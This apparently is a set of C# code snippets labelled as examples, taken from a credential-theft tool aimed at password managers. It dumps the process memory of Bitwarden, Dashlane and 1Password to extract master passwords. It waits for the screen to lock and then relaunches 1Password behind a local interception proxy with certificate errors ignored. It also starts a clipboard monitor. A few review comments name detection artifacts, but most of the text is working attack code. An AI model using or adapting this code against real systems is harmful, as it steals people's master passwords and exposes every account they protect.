Пример #1
 // Walks every process named "BiTWarDen", takes a text dump of each one from
 // MemoryHelper.dumpProcessMemory (implementation not shown here), and looks for a
 // fixed marker string in it. On the first dump that contains the marker it prints the
 // second NUL-separated field of the 100 characters starting at the marker and returns.
 // NOTE(review): this only yields anything if the secret is still resident in process
 // memory next to the marker; the observable side is an unrelated process reading a
 // password manager's memory, which is the event to monitor for.
 public static void dumpBitwardenMaster()
 {
     const string marker = "\"amr\":[\"Application\"]}";
     const int windowLength = 100;

     Process[] candidates = Process.GetProcessesByName("BiTWarDen");
     Console.WriteLine("[DEBUG] Number of Processes Found: {0}", candidates.Length);

     foreach (Process candidate in candidates)
     {
         DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", candidate.Id, candidate.ProcessName), Globals.DebugMode);
         string dump = MemoryHelper.dumpProcessMemory(candidate);

         // Nothing recognisable in this process: report it and move on to the next one.
         if (!dump.Contains(marker))
         {
             Console.WriteLine("[-] Unable to locate Master Password in this process.");
             continue;
         }

         DebugFunctions.writeDebug("Found String Indicator, attempting to pull password", Globals.DebugMode);

         // Fixed-size window from the marker onwards; no bounds check is made against the dump length.
         int markerAt = dump.IndexOf(marker, 0);
         string window = dump.Substring(markerAt, windowLength);
         string[] fields = window.Split('\0');
         Console.WriteLine("[SUCCESS] Potential Bitwarden Password Location found! {0}", fields[1]);
         return;
     }

     Console.WriteLine("[-] Unable to locate Master Password in any process.");
 }
Пример #2
        // Kills every running "1Password" process and starts the executable of the first one
        // again with a fixed argument string.
        //
        // force: when false, the method first blocks until the workstation-lock monitor reports
        //        a lock. As the original author noted, the monitor only reacts to a lock-change
        //        notification and does not determine whether the screen is locked right now.
        //
        // NOTE(review): the relaunch arguments are "--proxy-server=http://127.0.0.1:8888" and
        // "--ignore-certificate-errors" - presumably honoured by the target as Chromium-style
        // switches, i.e. traffic goes to a local proxy and certificate errors are not fatal.
        // A password-manager process whose command line carries either switch is the artifact
        // this leaves behind for process-creation logging to pick up.
        public static void LaunchWithProxy(bool force)
        {
            if (!force)
            {
                DebugFunctions.writeDebug("Waiting for Screen to lock before bouncing application", Globals.DebugMode);
                var lockWatcher = new Monitoring.CheckForWorkstationLocking();
                lockWatcher.Run();

                Console.WriteLine("Press ESC to exit...");

                // Poll the watcher's flag every 10 seconds until it flips.
                while (true)
                {
                    if (lockWatcher.screenLocked)
                    {
                        break;
                    }
                    System.Threading.Thread.Sleep(10000);
                }

                DebugFunctions.writeDebug("Screen lock notification recieved, continuing.", Globals.DebugMode);
            }

            string executablePath = "";
            Process[] running = Process.GetProcessesByName("1Password");

            if (running.Length < 1)
            {
                // Only logged; execution continues with an empty path.
                DebugFunctions.writeDebug("No Processes found", Globals.DebugMode);
            }

            foreach (Process instance in running)
            {
                // Remember where the binary lives before the instance is terminated.
                if (executablePath == string.Empty)
                {
                    executablePath = instance.MainModule.FileName;
                    DebugFunctions.writeDebug("Getting Process Path: " + executablePath, Globals.DebugMode);
                }

                instance.Kill();
            }

            DebugFunctions.writeDebug("Starting Process with New Arguments", Globals.DebugMode);
            var relaunched = new Process
            {
                StartInfo =
                {
                    FileName  = executablePath,
                    Arguments = "--proxy-server=http://127.0.0.1:8888 --ignore-certificate-errors"
                }
            };
            relaunched.Start();
        }
Пример #3
 // For each process named "dashlane": takes a text dump from MemoryHelper.dumpProcessMemory
 // (implementation not shown here), strips NUL characters, passes the result through
 // DebugFunctions.ReturnCleanASCII, and prints every match of a fixed regular expression
 // together with its index. Waits for a key press after each process.
 // NOTE(review): the output is a list of candidate strings, not a verified secret; the
 // observable side is an unrelated process reading a password manager's memory.
 public static void dumpDashlaneMaster()
 {
     const string candidatePattern = @"\s{3}(.+)\0{3}";

     Process[] targets = Process.GetProcessesByName("dashlane");
     Console.WriteLine("[DEBUG] Number of Processes Found: {0}", targets.Length);

     foreach (Process target in targets)
     {
         DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", target.Id, target.ProcessName), Globals.DebugMode);
         DebugFunctions.writeDebug("Dumping Memory", Globals.DebugMode);

         // Same pipeline as a single expression, split into named steps.
         string rawDump = MemoryHelper.dumpProcessMemory(target);
         string withoutNuls = rawDump.Replace("\0", string.Empty);
         string cleaned = DebugFunctions.ReturnCleanASCII(withoutNuls);

         DebugFunctions.writeDebug("Parsing Memory Dump. Warning this could take a while.", Globals.DebugMode);
         MatchCollection hits = Regex.Matches(cleaned, candidatePattern);
         foreach (Match hit in hits)
         {
             Console.WriteLine("[DEBUG] '{0}' found at index {1}", DebugFunctions.ReturnCleanASCII(hit.Value), hit.Index);
         }

         DebugFunctions.writeDebug("Finished", Globals.DebugMode);
         Console.ReadKey();
     }
 }
Пример #4
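        // Placeholder: prints a "not implemented" notice and returns.
        //
        // The original body returned unconditionally right after the notice, so every statement
        // that followed the return was unreachable (compiler warning CS0162). That dead code has
        // been dropped; what the method does at runtime is unchanged.
        public static void dumpDashLanePasswords()
        {
            Console.WriteLine("[!] Not Fully Implemented Yet!");
        }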
Пример #5
        //Enable Cleartext Passwords and then read memory.

        /**
         *   "security": {
         * "concealPasswords": false
         * },
         **/

        //Step 1. Add that line to the 1Password
        //Step 2. Dump Memory(?)
        //Step 3. Passwords


        // For each process named "1Password": takes a text dump from MemoryHelper.dumpProcessMemory,
        // rewrites "\n" as "<LF>", strips NUL characters, and prints the text found between one of
        // two marker pairs (a JSON field first, a plain-text label as fallback). Returns on the
        // first hit; otherwise reports the miss and waits for two key presses per process.
        //
        // The original carried a commented-out inline version of the memory read. It opened the
        // target with QueryInformation | VirtualMemoryRead access and copied committed
        // PAGE_READWRITE regions to a text file; the live code calls MemoryHelper.dumpProcessMemory
        // instead, whose implementation is not visible here.
        // NOTE(review): if the helper works the same way, a handle with VirtualMemoryRead access
        // requested on a password-manager process by an unrelated process is the event to alert on.
        public static void dump1passwordMaster()
        {
            const string jsonPrefix = "{\"name\":\"master-password\",\"value\":\"";
            const string jsonSuffix = ",\"type\":\"P\",\"designation\":\"password\"},{\"name\":\"account-key\"";
            const string textPrefix = "on 1password.com.<LF>";
            const string textSuffix = "<LF>secret key<LF>";

            Process[] targets = Process.GetProcessesByName("1Password");
            Console.WriteLine("[DEBUG] Number of Processes Found: {0}", targets.Length);

            foreach (Process target in targets)
            {
                DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", target.Id, target.ProcessName), Globals.DebugMode);

                // The "<LF>" substitution is kept from the original, where it was described as a
                // way to help rule out false positives in the output.
                string dump = MemoryHelper.dumpProcessMemory(target).Replace("\n", "<LF>").Replace("\0", String.Empty);

                if (dump.Contains(jsonPrefix))
                {
                    DebugFunctions.writeDebug("Found JSON Indicator, attempting to pull password", Globals.DebugMode);

                    // 35 is the length of jsonPrefix, so the slice starts right after it.
                    int valueStart = dump.IndexOf(jsonPrefix) + 35;
                    int valueEnd   = dump.IndexOf(jsonSuffix) - 1;
                    Console.WriteLine("[+] Potential 1Password Password Location found: {0}", dump.Substring(valueStart, valueEnd - valueStart));
                    return;
                }

                if (dump.Contains(textPrefix))
                {
                    DebugFunctions.writeDebug("First pass through didn't find anything, testing backup", Globals.DebugMode);

                    // Offset 20 is the original's value; it is one less than the label's length.
                    int valueStart = dump.IndexOf(textPrefix) + 20;
                    int valueEnd   = dump.IndexOf(textSuffix);
                    Console.WriteLine("[+] Potential 1Password Password Location found: {0}", dump.Substring(valueStart, valueEnd - valueStart));
                    return;
                }

                // Neither marker present in this process.
                Console.WriteLine("[-] Unable to locate Master Password :(");
                Console.ReadKey();
                Console.WriteLine("Fin. Press any key to exit");
                Console.ReadKey();
            }
        }
Пример #6
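        // Command-line entry point. Parses the arguments into MyArgs and dispatches on the flags:
        //   Debug     - turns on Globals.DebugMode
        //   Monitor   - calls Monitoring.Start()
        //   Local     - prints a "not implemented" notice
        //   Proxy     - starts ProxyHelper on a background thread and relaunches the named manager
        //   GetMaster - runs the master-password search for the named manager
        //   Dump      - prints a "not supported" notice
        // Proxy, GetMaster and Dump are mutually exclusive and are checked in that order.
        //
        // Changes from the original:
        //   * GetMaster without -Manager used to dereference a null string; it now prints the same
        //     "please specify" message the other branches use.
        //   * The manager name is lower-cased once with the invariant culture, so matching does
        //     not depend on the machine's locale.
        //   * The Proxy allow-list is an exact match. The original substring test accepted names
        //     that no switch case handles, which started the proxy thread and then did nothing.
        //   * The Dump branch's switch had two cases printing the same message; it is one line now.
        static void Main(string[] args)
        {
            var parsed = Args.Parse <MyArgs>(args);

            if (parsed.Debug)
            {
                Globals.DebugMode = true;
                Console.WriteLine("[DEBUG] Debug mode enabled. Outputting debug messages");
            }

            if (parsed.Monitor)
            {
                Console.WriteLine("[+] Starting Clipboard Monitor");
                Monitoring.Start();
            }

            if (parsed.Local)
            {
                Console.WriteLine("[!] Not Implemented (yet)");
            }

            // null means "no manager given"; otherwise the lower-cased name used for all matching below.
            string manager = String.IsNullOrEmpty(parsed.Manager) ? null : parsed.Manager.ToLowerInvariant();

            if (parsed.Proxy)
            {
                string[] supportedManagers = { "bitwarden", "1password" };
                if (manager == null)
                {
                    Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
                    return;
                }
                if (!supportedManagers.Contains(manager))
                {
                    Console.WriteLine("[!] Sorry, that password manager is not yet supported");
                    return;
                }

                // Background thread, so it does not keep the process alive once Main returns.
                new Thread(() =>
                {
                    Thread.CurrentThread.IsBackground = true;
                    DebugFunctions.writeDebug("Starting Proxy. Press any key to quit.", Globals.DebugMode);
                    ProxyHelper.startProxy();
                }).Start();

                switch (manager)
                {
                case "bitwarden":
                    BitWarden.LaunchWithProxy(parsed.Force);
                    break;

                case "1password":
                    _1Password.LaunchWithProxy(parsed.Force);
                    break;
                }

                Console.ReadKey();
                DebugFunctions.writeDebug("Stopping Proxy.", Globals.DebugMode);
                ProxyHelper.DoQuit();
                DebugFunctions.writeDebug("Proxy stopped, Press any key to exit.", Globals.DebugMode);
                Console.ReadKey();
                return;
            }
            else if (parsed.GetMaster)
            {
                if (manager == null)
                {
                    Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
                    return;
                }

                switch (manager)
                {
                case "bitwarden":
                    Console.WriteLine("[+] Checking for Bitwarden Executables.");
                    BitWarden.dumpBitwardenMaster();
                    Console.ReadKey();
                    break;

                case "1password":
                    Console.WriteLine("[+] Checking for 1Password Executables.");
                    _1Password.dump1passwordMaster();
                    break;

                case "keepass":
                    Console.WriteLine("[-] Not currently implemented for KeePass, but checked out HarmJ0y's KeeThief located at https://github.com/HarmJ0y/KeeThief");
                    break;

                case "dashlane":
                    Dashlane.dumpDashlaneMaster();
                    break;

                default:
                    Console.WriteLine("[-] Password manager not currently supported!");
                    break;
                }
                return;
            }
            else if (parsed.Dump)
            {
                if (manager == null)
                {
                    Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
                    return;
                }

                // No manager has a dump implementation yet.
                Console.WriteLine("[!] This functionality is not yet supported!");
                return;
            }
            else
            {
                Console.WriteLine("[!] No Options Selected");
            }
        }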